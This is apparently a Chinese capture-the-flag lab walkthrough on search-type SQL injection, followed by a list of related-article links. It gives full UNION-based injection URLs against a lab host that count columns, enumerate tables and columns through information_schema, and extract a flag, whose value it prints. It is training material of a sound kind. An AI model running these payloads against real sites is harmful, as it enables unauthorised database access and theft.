like语法
"%"匹配任何字符,  "like"的意思就是像,  "$" 变量
SQL语句:select username,id from admin where username like '%$name%'

进入靶场后出现此界面,在登录界面输入1’判断一下是数字型还是字符型。

页面下方出现账号密码错误或用户未注册!那先注册,后登录。

判断是否有注入点

搜索框内  输入a正常回显

输入a’报错

猜解列名数量(字段数)

URL地址中输入a' order by 1 #  报错

http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 # &action=search

URL地址中输入a’’/a% order by 1 #正常回显,却无法判断字段数,也无法查看报错位。我们尝试把注释符#换成--+,正常回显

 http://47.103.94.191:8015/sqli_1.php?title=a' order by 1 --+ &action=search

8页面显示不正常,发现最大正常位是7 

查看报错位(2,3,4,5报错)

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,2,3,4,5,6,7 --+ &action=search

获取数据库信息

获取数据库名称(whalwl)

数据库表的信息(blog,heroes,movies,this_flag,users,visitors)

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(table_name),6,7 from information_schema.tables where table_schema=database() --+ &action=search

查找this_flag表下的列

数据库列的信息:id,num,flag

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,group_concat(column_name),6,7 from information_schema.columns where table_name='this_flag' --+ &action=search

获取flag

http://47.103.94.191:8015/sqli_1.php?title=a' union select 1,database(),3,4,flag,6,7 from whalwl.this_flag --+ &action=search

提交flag

flag{86b757e867b43d16050225ab516b2274}

SQL注入:搜索型注入相关推荐

  1. Pikachu靶场-SQL注入-搜索型注入过关步骤

    Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...

  2. SQL注入-整型注入实例

    发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占 ...

  3. SQL注入之MySQL注入学习笔记(二)

    补充:MySQL注释方法 文章目录 MySQL注入 基本介绍 字符型 数字型 搜索型 Cookie注入 HTTP头注入 具体实例 数字型注入 一般类型 被单引号包裹起来的 双引号加小括号包裹 两个括号 ...

  4. mysql sql注入工具_SQL注入工具实践

    程序简介 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入. ...

  5. SQL注入——联合查询注入

    0x01 SQL注入的原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原 有SQL结构,达到编写程序时意料之外结果的攻击行为.其成因可以归结外一下 两个原因叠加造成的: 1 ...

  6. python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现

    通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的.这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入, ...

  7. 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(七)-SQL注入字符型

    目录 前言: 一.简介 二.项目配置 三.代码编写 四.运行测试 前言: 前面完成了 SQL 注入漏洞的数字型输入,其实 SQL 注入漏洞还有很多其他类型的注入,例如:字符型注入.宽字节注入等,相应的 ...

  8. SQL注入之字符型注入练习(pikachu)

    SQL注入之字符型 实现目标:获取到pikachu下的表.数据信息 靶场:pikachu =>sql-inject=>字符型注入 2.实验步骤 第一步目标:拿到数据库名 2.1确定请求方法 ...

  9. web安全入门之SQL注入-时间型盲注

    SQL注入之时间型盲注 1.时间型盲注 时间型盲注条件极为苛刻,不管输入什么,WEB页面回显相同的结果,此时我们无法通过报错型注入以及布尔型盲注来爆数据,此时数据在交互完成以后目标网站没有正确和错误的 ...

最新文章

  1. HttpWatch7.0测试工具
  2. 实体类中存在List集合,怎么在xml文件中,对应
  3. Hollis原创|深入分析Java的编译原理
  4. matlab实现photoshop,photoshop图像滤镜——素描算法(含matlab代码)
  5. uos系统虚拟机_体验中兴深度联合推出的「UOS」统一操作系统
  6. 站在信息安全角度 人脸识别面临五大问题
  7. 构架https服务器
  8. 【EMC专题】共模和差模
  9. Android Studio Menu item 的简单使用
  10. 一花一世界,在微服务中定义边界
  11. 要求用 100 元买 100 只鸡,其中公鸡五元一只,母鸡三元一只,小鸡 1 元三只,规定每种至少买一 只
  12. 【OpenCV + Python】之bitwise_and、bitwise_not,bitwise_xor等图像基本运算(opencv位操作)
  13. 【年度总结】满船清梦压星河
  14. 可以玩所有游戏的计算机配置,笔者教你玩大型游戏的电脑配置
  15. java jlabel图片大小_java – 调整图片大小以适应JLabel
  16. 土谷贞雄将携中日知名建筑师在深圳展示都市社群规划成功案例
  17. opencv 区域生长(种子自动选取)python
  18. 成都超级计算机中心玻璃,全球前十的成都超算中心计算能力大比拼!看看它到底有多厉害?...
  19. 【转】隐函数绘制并提取数据
  20. 2个鸡蛋100楼问题

热门文章

  1. LIO-SAM: 论文翻译
  2. Rhino 3D旋转
  3. Windows 7 Build 7068 下载泄露
  4. 如何在网站中添加音乐
  5. 【ArcGIS】图文攻略:使用ArcGIS将CAD的dwg文件转换为kml格式
  6. 教你用JavaScript制作背景图像滚动效果
  7. 程序员为什么不会修电脑
  8. ViTDet程序调用不了GPU全部内存,而且显示NVCC: not available
  9. js / java 文档对比
  10. 计算机里FC方式,谁知道头文字D里提到的FD,FR,FC,FF指的是什么驱动方式的车?...